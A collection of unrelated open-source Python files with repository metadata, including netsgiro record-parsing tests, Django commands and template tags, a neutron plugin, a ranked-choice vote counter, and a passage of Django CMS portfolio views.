hdf_files = modis.ndvi_hdf_for_tile(tilename, modis_dir)
hdf_files = {ts: fname for (fname, ts) in hdf_files}
# -- Figure out the fractions we have to update
modgrid = grids.MODISGrid()
tile_h, tile_v = modis.parse_tilename(tilename)
print 'Finding fractions...',
sys.stdout.flush()
fractions = modgrid.get_cells_for_tile(tile_h, tile_v)
assert np.all(ndvi_header.list_available_fracnums() ==
qa_header.list_available_fracnums())
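# Keep only this tile's fractions that are actually present in the worldgrid.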
fractions = np.intersect1d(fractions,
ndvi_header.list_available_fracnums())
print '->', len(fractions), 'available'
sys.stdout.flush()
| {
"content_hash": "22df546ebc6f33d958db661bc50c4a13",
"timestamp": "",
"source": "github",
"line_count": 76,
"max_line_length": 78,
"avg_line_length": 31.407894736842106,
"alnum_prop": 0.6351068286552157,
"repo_name": "terrai/rastercube",
"id": "23f08c97edc1d0e766ccfd658d7eee505bc27c04",
"size": "2387",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rastercube/scripts/show_available_fractions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "194904"
},
{
"name": "Ruby",
"bytes": "2529"
},
{
"name": "Shell",
"bytes": "6960"
}
],
"symlink_target": ""
} |
import time
from django.core.management.base import BaseCommand
from api.util import expire_inboxes, expire_items, expire_requests
class Command(BaseCommand):
help = 'Background cleanup task'
def handle(self, *args, **options):
inboxes = expire_inboxes()
print('expired %d inboxes' % inboxes)
# expire items of remaining inboxes
items, inboxes = expire_items()
print('expired %d items in %d active inboxes' % (items, inboxes))
# we expect this command to run once per minute, so to achieve
# a 10 second interval, we'll do 6 iterations within a
# single run
for n in range(0, 6):
if n != 0:
time.sleep(10)
requests = expire_requests()
print('expired %d requests' % requests)
| {
"content_hash": "56066a42a5be3ac3a969af9bc87190f8",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 67,
"avg_line_length": 31.130434782608695,
"alnum_prop": 0.7039106145251397,
"repo_name": "fanout/webhookinbox",
"id": "db42a1c4da62f83ae0b09fed18611bc1ae96e3d2",
"size": "716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/management/commands/cleanup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "8911"
},
{
"name": "Dockerfile",
"bytes": "493"
},
{
"name": "HTML",
"bytes": "13340"
},
{
"name": "JavaScript",
"bytes": "44101"
},
{
"name": "Makefile",
"bytes": "4590"
},
{
"name": "Procfile",
"bytes": "45"
},
{
"name": "Python",
"bytes": "45452"
},
{
"name": "Shell",
"bytes": "56"
}
],
"symlink_target": ""
} |
from datetime import date
from typing import List
import pytest
from netsgiro import (
AssignmentType,
AvtaleGiroRegistrationType,
RecordType,
ServiceCode,
TransactionType,
)
from netsgiro.records import (
AssignmentEnd,
AssignmentStart,
AvtaleGiroAgreement,
Record,
TransactionAmountItem1,
TransactionAmountItem2,
TransactionAmountItem3,
TransactionSpecification,
TransmissionEnd,
TransmissionStart,
)
def test_transmission_start():
record = TransmissionStart.from_string(
'NY000010555555551000081000080800000000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.NONE
assert record.RECORD_TYPE == RecordType.TRANSMISSION_START
assert record.data_transmitter == '55555555'
assert record.transmission_number == '1000081'
assert record.data_recipient == '00008080'
def test_transmission_start_fails_when_invalid_format():
line = 'XX' + ('0' * 78)
with pytest.raises(
ValueError,
match=f'{line!r} did not match TransmissionStart record format',
):
TransmissionStart.from_string(line)
def test_transmission_end():
record = TransmissionEnd.from_string(
'NY000089000000060000002200000000000000600170604000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.NONE
assert record.RECORD_TYPE == RecordType.TRANSMISSION_END
assert record.num_transactions == 6
assert record.num_records == 22
assert record.total_amount == 600
assert record.nets_date == date(2004, 6, 17)
def test_assignment_start_for_avtalegiro_payment_requests():
record = AssignmentStart.from_string(
'NY210020000000000400008688888888888000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.agreement_id == '000000000'
assert record.assignment_number == '4000086'
assert record.assignment_account == '88888888888'
def test_assignment_start_for_avtalegiro_agreements():
record = AssignmentStart.from_string(
'NY212420000000000400008688888888888000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.AVTALEGIRO_AGREEMENTS
assert record.agreement_id is None
assert record.assignment_number == '4000086'
assert record.assignment_account == '88888888888'
def test_assignment_start_for_avtalegiro_cancellation():
record = AssignmentStart.from_string(
'NY213620000000000400008688888888888000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.AVTALEGIRO_CANCELLATIONS
assert record.agreement_id is None
assert record.assignment_number == '4000086'
assert record.assignment_account == '88888888888'
def test_assignment_start_for_ocr_giro_transactions():
record = AssignmentStart.from_string(
'NY090020001008566000000299991042764000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_START
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.agreement_id == '001008566'
assert record.assignment_number == '0000002'
assert record.assignment_account == '99991042764'
def test_assignment_end_for_avtalegiro_payment_requests():
record = AssignmentEnd.from_string(
'NY210088000000060000002000000000000000600170604170604000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.num_transactions == 6
assert record.num_records == 20
assert record.total_amount == 600
assert record.nets_date_earliest == date(2004, 6, 17)
assert record.nets_date_latest == date(2004, 6, 17)
def test_assignment_end_for_avtalegiro_agreements():
record = AssignmentEnd.from_string(
'NY212488000000060000002000000000000000000000000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.AVTALEGIRO_AGREEMENTS
assert record.num_transactions == 6
assert record.num_records == 20
assert record.total_amount is None
assert record.nets_date_earliest is None
assert record.nets_date_latest is None
def test_assignment_end_for_avtalegiro_cancellations():
record = AssignmentEnd.from_string(
'NY213688000000060000002000000000000000600170604170604000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.AVTALEGIRO_CANCELLATIONS
assert record.num_transactions == 6
assert record.num_records == 20
assert record.total_amount == 600
assert record.nets_date_latest == date(2004, 6, 17)
assert record.nets_date_earliest == date(2004, 6, 17)
def test_assignment_end_for_ocr_giro_transactions():
record = AssignmentEnd.from_string(
'NY090088000000200000004200000000005144900200192200192200192000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.ASSIGNMENT_END
assert record.assignment_type == AssignmentType.TRANSACTIONS
assert record.num_transactions == 20
assert record.num_records == 42
assert record.total_amount == 5144900
assert record.nets_date == date(1992, 1, 20)
assert record.nets_date_earliest == date(1992, 1, 20)
assert record.nets_date_latest == date(1992, 1, 20)
def test_transaction_amount_item_1_for_avtalegiro_payment_request():
record = TransactionAmountItem1.from_string(
'NY2121300000001170604 00000000000000100 008000011688373000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_1
assert record.transaction_type == TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION
assert record.transaction_number == 1
assert record.nets_date == date(2004, 6, 17)
assert record.amount == 100
assert record.kid == '008000011688373'
def test_transaction_amount_item_1_for_avtalegiro_cancellation():
record = TransactionAmountItem1.from_string(
'NY2193300000001170604 00000000000000100 008000011688373000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_1
assert record.transaction_type == TransactionType.AVTALEGIRO_CANCELLATION
assert record.transaction_number == 1
assert record.nets_date == date(2004, 6, 17)
assert record.amount == 100
assert record.kid == '008000011688373'
def test_transaction_amount_item_1_for_ocr_giro_transactions():
record = TransactionAmountItem1.from_string(
'NY09103000000012001921320101464000000000000102000 0000531000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_1
assert record.transaction_type == TransactionType.FROM_GIRO_DEBITED_ACCOUNT
assert record.transaction_number == 1
assert record.nets_date == date(1992, 1, 20)
assert record.centre_id == '13'
assert record.day_code == 20
assert record.partial_settlement_number == 1
assert record.partial_settlement_serial_number == '01464'
assert record.sign == '0'
assert record.amount == 102000
assert record.kid == '0000531'
def test_transaction_amount_item_2_for_avtalegiro_payment_request():
record = TransactionAmountItem2.from_string(
'NY2121310000001NAVN 00000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_2
assert record.transaction_type == TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION
assert record.transaction_number == 1
assert record.payer_name == 'NAVN'
assert record.reference is None
def test_transaction_amount_item_2_for_ocr_giro_transactions():
record = TransactionAmountItem2.from_string(
'NY091031000000196368271940990385620000000160192999905123410000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_2
assert record.transaction_type == TransactionType.FROM_GIRO_DEBITED_ACCOUNT
assert record.transaction_number == 1
assert record.form_number == '9636827194'
assert record.payer_name is None
assert record.reference == '099038562'
assert record.bank_date == date(1992, 1, 16)
assert record.debit_account == '99990512341'
def test_transaction_amount_item_2_for_ocr_giro_with_data_in_filler_field():
record = TransactionAmountItem2.from_string(
'NY091031000000297975960160975960161883206160192999910055240000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_2
assert record.transaction_type == TransactionType.FROM_GIRO_DEBITED_ACCOUNT
assert record.transaction_number == 2
assert record.form_number == '9797596016'
assert record.payer_name is None
assert record.reference == '097596016'
assert record.bank_date == date(1992, 1, 16)
assert record.debit_account == '99991005524'
assert record._filler == '1883206'
def test_transaction_amount_item_3_for_ocr_giro_transactions():
record = TransactionAmountItem3.from_string(
'NY0921320000001Foo bar baz 0000000000000000000000000'
)
assert record.service_code == ServiceCode.OCR_GIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AMOUNT_ITEM_3
assert record.transaction_type == TransactionType.PURCHASE_WITH_TEXT
assert record.transaction_number == 1
assert record.text == 'Foo bar baz'
def test_transaction_specification_for_avtalegiro_payment_request():
record = TransactionSpecification.from_string(
'NY212149000000140011 Gjelder Faktura: 168837 Dato: 19/03/0400000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_SPECIFICATION
assert record.transaction_type == TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION
assert record.transaction_number == 1
assert record.line_number == 1
assert record.column_number == 1
assert record.text == ' Gjelder Faktura: 168837 Dato: 19/03/04'
def make_specification_records(
num_lines: int, num_columns: int = 2
) -> List[TransactionSpecification]:
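# Build num_lines * num_columns specification records (two columns per line by default) for the tests below.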
return [
TransactionSpecification(
service_code=ServiceCode.AVTALEGIRO,
transaction_type=TransactionType.AVTALEGIRO_WITH_BANK_NOTIFICATION,
transaction_number=1,
line_number=line,
column_number=column,
text=f'Line {line}, column {column}',
)
for line in range(1, num_lines + 1)
for column in range(1, num_columns + 1)
]
def test_transaction_specification_to_text_with_max_number_of_records():
records = make_specification_records(42)
result = TransactionSpecification.to_text(records)
assert len(result.splitlines()) == 42
assert 'Line 1, column 1' in result
assert 'Line 42, column 2' in result
def test_transaction_specification_to_text_with_too_many_records():
records = make_specification_records(43)
with pytest.raises(ValueError, match='Max 84 specification records allowed, got 86'):
TransactionSpecification.to_text(records)
def test_avtalegiro_active_agreement():
record = AvtaleGiroAgreement.from_string(
'NY21947000000010 008000011688373J00000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AGREEMENTS
assert record.transaction_type == TransactionType.AVTALEGIRO_AGREEMENT
assert record.transaction_number == 1
assert record.registration_type == AvtaleGiroRegistrationType.ACTIVE_AGREEMENT
assert record.kid == '008000011688373'
assert record.notify is True
def test_avtalegiro_new_or_updated_agreement():
record = AvtaleGiroAgreement.from_string(
'NY21947000000011 008000011688373N00000000000000000000000000000000000000'
)
assert record.service_code == ServiceCode.AVTALEGIRO
assert record.RECORD_TYPE == RecordType.TRANSACTION_AGREEMENTS
assert record.transaction_type == TransactionType.AVTALEGIRO_AGREEMENT
assert record.transaction_number == 1
assert record.registration_type == AvtaleGiroRegistrationType.NEW_OR_UPDATED_AGREEMENT
assert record.kid == '008000011688373'
assert record.notify is False
def test__split_text_to_lines_and_columns_validation():
"""
Make sure the validation in
TransactionSpecification._split_text_to_lines_and_columns works.
"""
# Test <= max line count
for i in [0, 1, 42]:
for _ in TransactionSpecification._split_text_to_lines_and_columns('test\n' * i):
pass
# Test > max line count
for i in [43, 100, 1000]:
with pytest.raises(ValueError, match='Max 42 specification lines allowed'):
for _ in TransactionSpecification._split_text_to_lines_and_columns('test\n' * i):
pass
# Test <= max line length
for i in [0, 1, 80]:
for _ in TransactionSpecification._split_text_to_lines_and_columns('i' * i):
pass
# Test > max line length
for i in [81, 100, 1000]:
with pytest.raises(ValueError, match='Specification lines must be max 80 chars long'):
for _ in TransactionSpecification._split_text_to_lines_and_columns('i' * i):
pass
def test_record__to_ocr():
"""Test that the record to_ocr abstract method is required."""
class SomeRecordDerivative(Record):
...
with pytest.raises(
TypeError,
match="Can't instantiate abstract class SomeRecordDerivative with abstract method",
):
SomeRecordDerivative()
| {
"content_hash": "709c3423cb414a894076ea6dcd4b70f3",
"timestamp": "",
"source": "github",
"line_count": 434,
"max_line_length": 94,
"avg_line_length": 34.40783410138249,
"alnum_prop": 0.7226947030067635,
"repo_name": "otovo/python-netsgiro",
"id": "cf846240479f77040256d5c0888a6cbfa595f532",
"size": "14933",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_record_parsing.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "128712"
}
],
"symlink_target": ""
} |
from django import template
from django.conf import settings
from django.urls import reverse
from django.utils.html import format_html
from django_gravatar.helpers import get_gravatar_url
register = template.Library()
@register.simple_tag
def user_link(user):
gravatar_url = get_gravatar_url(user.email, size=16)
profile_url = reverse('user_profile', args=[user.username])
return format_html("""<a href="{0}"><img class="gravatar-small" src="{1}"/>{2}</a>""", profile_url, gravatar_url, user.get_full_name())
@register.inclusion_tag('assets/asset_title.html')
def asset_title(asset, as_link):
return {'asset': asset, 'as_link': as_link}
@register.inclusion_tag('assets/asset_common.html')
def asset_common(user, asset, verbose):
return {'user': user, 'asset': asset, 'verbose': verbose}
@register.inclusion_tag('assets/asset_thumbnail.html')
def asset_thumbnail(asset, as_link=True):
return {'asset': asset, 'as_link': as_link}
| {
"content_hash": "abb7750477175cf189a180003aaa4c5c",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 139,
"avg_line_length": 36.84615384615385,
"alnum_prop": 0.7181628392484343,
"repo_name": "portnov/assethub",
"id": "9df9a352bff77bab4aaf788ae4564587ae8b1093",
"size": "958",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "assethub/assets/templatetags/common.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "5879"
},
{
"name": "HTML",
"bytes": "29411"
},
{
"name": "Python",
"bytes": "131052"
},
{
"name": "Shell",
"bytes": "135"
}
],
"symlink_target": ""
} |
from unittest import TestCase, main
import os
import time
import sys
import tempfile
import difflib
import svtools.varlookup
class IntegrationTest_varlookup(TestCase):
def run_integration_test(self):
test_directory = os.path.dirname(os.path.abspath(__file__))
test_data_dir = os.path.join(test_directory, 'test_data', 'varlookup')
input_a = os.path.join(test_data_dir, 'input_a.bed')
input_b = os.path.join(test_data_dir, 'input_b.bed')
expected_result = os.path.join(test_data_dir, 'expected.bed')
temp_descriptor, temp_output_path = tempfile.mkstemp(suffix='.bed')
with os.fdopen(temp_descriptor, 'w') as output_handle:
svtools.varlookup.varLookup(input_a, input_b, output_handle, 50, '#', 'TEST')
expected_lines = open(expected_result).readlines()
# set timestamp for diff
expected_lines[1] = '##fileDate=' + time.strftime('%Y%m%d') + '\n'
produced_lines = open(temp_output_path).readlines()
diff = difflib.unified_diff(produced_lines, expected_lines, fromfile=temp_output_path, tofile=expected_result)
result = ''.join(diff)
if result != '':
for line in result:
sys.stdout.write(line)
self.assertFalse(result)
os.remove(temp_output_path)
def run_issue_209_regression_test(self):
test_directory = os.path.dirname(os.path.abspath(__file__))
test_data_dir = os.path.join(test_directory, 'test_data', 'varlookup')
input_a = os.path.join(test_data_dir, 'input_a1.bed')
input_b = os.path.join(test_data_dir, 'input_b1.bed')
expected_result = os.path.join(test_data_dir, 'expected1.bed')
temp_descriptor, temp_output_path = tempfile.mkstemp(suffix='.bed')
with os.fdopen(temp_descriptor, 'w') as output_handle:
svtools.varlookup.varLookup(input_a, input_b, output_handle, 50, '#', 'TEST')
expected_lines = open(expected_result).readlines()
# set timestamp for diff
expected_lines[1] = '##fileDate=' + time.strftime('%Y%m%d') + '\n'
produced_lines = open(temp_output_path).readlines()
diff = difflib.unified_diff(produced_lines, expected_lines, fromfile=temp_output_path, tofile=expected_result)
result = ''.join(diff)
if result != '':
for line in result:
sys.stdout.write(line)
self.assertFalse(result)
os.remove(temp_output_path)
if __name__ == "__main__":
main()
| {
"content_hash": "65546435a72437455718c1f80f9eaa09",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 118,
"avg_line_length": 47.56603773584906,
"alnum_prop": 0.6295120983736613,
"repo_name": "hall-lab/svtools",
"id": "c931e62ee32c8a2216391c72daa2845f602a8fe1",
"size": "2521",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/varlookup_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "2266"
},
{
"name": "Python",
"bytes": "468744"
},
{
"name": "Shell",
"bytes": "4721"
}
],
"symlink_target": ""
} |
from abc import abstractmethod
class Configurable(object):
class ConfigureResult(object):
def __init__(self):
self.message = ""
self.successed = True
@abstractmethod
def init_from_config(self, configure, **kwargs):
pass
@abstractmethod
def get_from_context(self, context):
pass
@abstractmethod
def set_to_context(self, context):
pass
| {
"content_hash": "17d82f85951f657657e356311ea3c2a9",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 52,
"avg_line_length": 17.12,
"alnum_prop": 0.6051401869158879,
"repo_name": "squall1988/lquant",
"id": "c6515909008a98cc7c339cc6b7af4abf356b181a",
"size": "444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Configurable.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "248132"
},
{
"name": "Shell",
"bytes": "224"
}
],
"symlink_target": ""
} |
"""
Imageio is a Python library that provides an easy interface to read and
write a wide range of image data, including animated images, volumetric
data, and scientific formats. It is cross-platform, runs on Python 2.x
and 3.x, and is easy to install.
Main website: http://imageio.github.io
"""
__version__ = '1.4'
# Load some bits from core
from .core import FormatManager, RETURN_BYTES # noqa
# Instantiate format manager
formats = FormatManager()
# Load the functions
from .core.functions import help # noqa
from .core.functions import get_reader, get_writer # noqa
from .core.functions import imread, mimread, volread, mvolread # noqa
from .core.functions import imwrite, mimwrite, volwrite, mvolwrite # noqa
# Load function aliases
from .core.functions import read, save # noqa
from .core.functions import imsave, mimsave, volsave, mvolsave # noqa
# Load all the plugins
from . import plugins # noqa
# expose the show method of formats
show_formats = formats.show
# Clean up some names
del FormatManager
| {
"content_hash": "f6debeb6951234068ea63e1273e97c02",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 74,
"avg_line_length": 29.37142857142857,
"alnum_prop": 0.754863813229572,
"repo_name": "patricksnape/imageio",
"id": "4a43edcaed254751b0a992669f6a76e1ee1999a0",
"size": "1322",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "imageio/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "PowerShell",
"bytes": "6422"
},
{
"name": "Python",
"bytes": "630531"
}
],
"symlink_target": ""
} |
from django.db import models
class Category(models.Model):
title = models.CharField(max_length=200)
def __unicode__(self):
return self.title
| {
"content_hash": "f756518ff710e1cb86a1c83cd0312c40",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 44,
"avg_line_length": 20,
"alnum_prop": 0.68125,
"repo_name": "mozillazg/django-simple-projects",
"id": "517e52df7dd0147c17c478cbed077b6556b50ad2",
"size": "207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "projects/custom-context-processors/hello/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "42173"
},
{
"name": "HTML",
"bytes": "8678"
},
{
"name": "JavaScript",
"bytes": "75416"
},
{
"name": "Python",
"bytes": "73644"
}
],
"symlink_target": ""
} |
from neutron_lib.api.definitions import network_ip_availability
from neutron_lib.db import utils as db_utils
from neutron_lib import exceptions
import neutron.db.db_base_plugin_v2 as db_base_plugin_v2
import neutron.db.network_ip_availability_db as ip_availability_db
class NetworkIPAvailabilityPlugin(ip_availability_db.IpAvailabilityMixin,
db_base_plugin_v2.NeutronDbPluginV2):
"""This plugin exposes IP availability data for networks and subnets."""
_instance = None
supported_extension_aliases = [network_ip_availability.ALIAS]
__filter_validation_support = True
@classmethod
def get_instance(cls):
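# Lazily create and reuse a single shared plugin instance (simple singleton accessor).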
if cls._instance is None:
cls._instance = cls()
return cls._instance
def get_plugin_description(self):
return "Provides IP availability data for each network and subnet."
@classmethod
def get_plugin_type(cls):
return "network-ip-availability"
def get_network_ip_availabilities(self, context, filters=None,
fields=None):
"""Returns ip availability data for a collection of networks."""
net_ip_availabilities = super(
NetworkIPAvailabilityPlugin, self
).get_network_ip_availabilities(context, filters)
return [db_utils.resource_fields(net_ip_availability, fields)
for net_ip_availability in net_ip_availabilities]
def get_network_ip_availability(self, context, id=None, fields=None):
"""Return ip availability data for a specific network id."""
filters = {'network_id': [id]}
result = self.get_network_ip_availabilities(context, filters)
if result:
return db_utils.resource_fields(result[0], fields)
else:
raise exceptions.NetworkNotFound(net_id=id)
| {
"content_hash": "c8b4c750931c6c2f9e58eb0fd6b2ab95",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 76,
"avg_line_length": 39.255319148936174,
"alnum_prop": 0.6693766937669376,
"repo_name": "mahak/neutron",
"id": "f95679ae763b03efb2a7fc0eb6e002375c172435",
"size": "2429",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/services/network_ip_availability/plugin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jinja",
"bytes": "2773"
},
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "15942116"
},
{
"name": "Ruby",
"bytes": "1257"
},
{
"name": "Shell",
"bytes": "83270"
}
],
"symlink_target": ""
} |
import sys
import os
import re
from paste.script.templates import var
from paste.script.templates import Template
from collective.generic.skel.buildout.common import boolify
class Package(Template):
"""
Package template to do a double namespace egg.
    Although it pretends to do that, it is a base for sub templates that need to have all sorts
    of variables defined. That's why there are some curious Plone bits there.
"""
_template_dir = 'tmpl'
summary = "Template1 for cgwb testing"
egg_plugins = ['PasteScript',]
use_cheetah = True
vars = [
var('namespace', 'Namespace', default='%(namespace)s'),
var('nested_namespace', 'Nested Namespace', default='%(package)s'),
var('version', 'Version', default='1.0'),
var('author', 'Author', default = 'foo',),
var('author_email', 'Email', default = '%s@%s' % ('bar', 'localhost')),
var('tp3option', 'URL of homepage', default='http://python.org'),
var('tp3option3', 'One-line description of the package', default='Project %s'),
var('keywords', 'Space-separated keywords/tags'),
var('license_name', 'License name', default='GPL'),
var('project_name', 'Project namespace name (to override the first given project name forced by some derivated templates, left empty in doubt)', default=''),
]
def run(self, command, output_dir, vars):
self.output_dir = output_dir
self.boolify(vars)
self.pre(command, output_dir, vars)
# may we have register variables ?
if self.output_dir:
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
output_dir = self.output_dir
if not os.path.isdir(output_dir):
raise Exception('%s is not a directory' % output_dir)
self.write_files(command, self.output_dir, vars)
self.post(command, output_dir, vars)
if not command.options.quiet:
print "-" * 79
print "The template has been generated in %s" % self.output_dir
print "-" * 79
def boolify(self, d, keys=None):
return boolify(d, keys)
def read_vars(self, command=None):
vars = Template.read_vars(self, command)
infos = {}
project = ''
if command:
project = command.args[0]
from paste.script import pluginlib
self.module = self.__class__.__module__
def wrap_egg_info_dir(c, n):
print "%s" % (
" Monkey patching egg_info_dir "
)
return None
pluginlib.egg_info_dir = wrap_egg_info_dir
return vars
| {
"content_hash": "eff58ea735aff27f81c4caf598b5b977",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 165,
"avg_line_length": 37.09722222222222,
"alnum_prop": 0.6038936727817297,
"repo_name": "collective/collective.generic.webbuilder",
"id": "ea719edc68477b2b0d20f6061571e0abacf592bc",
"size": "2671",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/collective/generic/webbuilder/tests/egg/src/tp2/package.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "147995"
},
{
"name": "JavaScript",
"bytes": "335659"
},
{
"name": "Python",
"bytes": "79817"
},
{
"name": "Shell",
"bytes": "3596"
}
],
"symlink_target": ""
} |
"""
Licensed under CC Attribution http://creativecommons.org/licenses/by/3.0/
Copyright 2011, Steve Engledow
"""
def do_round(votes, counts=None, loser=None):
    # Avoid a shared mutable default argument; start each run with a fresh tally.
    if counts is None:
        counts = {}
for vote in votes:
for i in range(len(vote)):
if not loser:
if vote[i] not in counts:
counts[vote[i]] = 0
counts[vote[i]] += 1
break
else:
if vote[i] == loser:
for j in range(i+1, len(vote)):
if vote[j] in counts:
counts[vote[j]] += 1
break
break
elif vote[i] in counts:
break
print counts
# determine if there's a winner
total = sum(counts.values())
for choice in counts:
if counts[choice] > total / 2:
print choice, "wins!"
return
# otherwise, find the loser
loser = None
for choice in counts:
if not loser or counts[choice] < counts[loser]:
loser = choice
print loser, "loses"
del counts[loser]
do_round(votes, counts, loser = loser)
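# Illustrative note (not part of the original script): the expected input is a
# plain-text ballot file, one ballot per line, candidates listed from most to
# least preferred, e.g.
#
#   alice bob carol
#   bob carol alice
#   carol alice bob
#
# Each round tallies first choices among the surviving candidates; if nobody
# holds a strict majority, the candidate with the fewest votes is eliminated
# and their ballots transfer to the next surviving preference.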
import sys
if len(sys.argv) != 2:
print "Expected a filename as the sole argument."
print "The file should be a space-separated list of vote preferences with each ballot separated by a newline."
else:
votes = []
f = open(sys.argv[1], 'r')
for line in f:
votes.append(line.split())
f.close()
do_round(votes)
| {
"content_hash": "0e2272513b4002bcb6e1d40c12db9bfb",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 114,
"avg_line_length": 28.547169811320753,
"alnum_prop": 0.5181758096497026,
"repo_name": "stilvoid/av",
"id": "4a2368e7af4c8acc2321130b1493ba8f88acc213",
"size": "1513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "vote.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1513"
}
],
"symlink_target": ""
} |
"""Cms portfolio views"""
from datetime import datetime
from django import http
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http.response import HttpResponseRedirect
from django.utils.translation import ugettext_lazy as _
from boski.views.crud import ListView, CreateView, UpdateView, DeleteView
from boski.mixins import LoginRequiredMixin
from ..models import Entry, Company
from .forms import EntryForm, CompanyForm
__author__ = 'Daniel Alkemic Czuba <[email protected]>'
class List(LoginRequiredMixin, ListView):
queryset = Entry.objects.all().filter(deleted_at__isnull=True)
breadcrumbs = ({'name': _('Portfolio'), 'url': 'cms:portfolio:index'},)
listingColumns = (
('id', '#'),
('name', _('Name')),
('created_at', _('Date created')),
('action', _('Actions'))
)
filters = (
('created_at__gte', {
'label': _('Created from'),
'type': 'text',
'class': 'calendar',
}),
('created_at__lte', {
'label': _('To'),
'type': 'text',
'class': 'calendar',
}),
)
mapColumns = {
'id': '_displayAsIs',
'name': '_displayEditLink',
'created_at': '_displayDate',
'action': '_displayActionWithActivationToggleLink',
}
def get_fields_name(self):
fields_name = super(List, self).get_fields_name()
return fields_name + ['activated_at', 'slug']
orderingColumns = {'id', 'name', 'created_at'}
searchColumns = {'name', 'description', 'technologies'}
class Create(LoginRequiredMixin, CreateView):
model = Entry
form_class = EntryForm
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': self.name, 'url': 'cms:portfolio:create'}
class Update(LoginRequiredMixin, UpdateView):
model = Entry
form_class = EntryForm
@property
def breadcrumbs(self):
return {'name': _('Portfolio'), 'url': 'cms:portfolio:index'}, \
{'name': self.name, 'url': 'cms:portfolio:update',
'pk': self.get_object().pk}
class Delete(LoginRequiredMixin, DeleteView):
model = Entry
@property
def breadcrumbs(self):
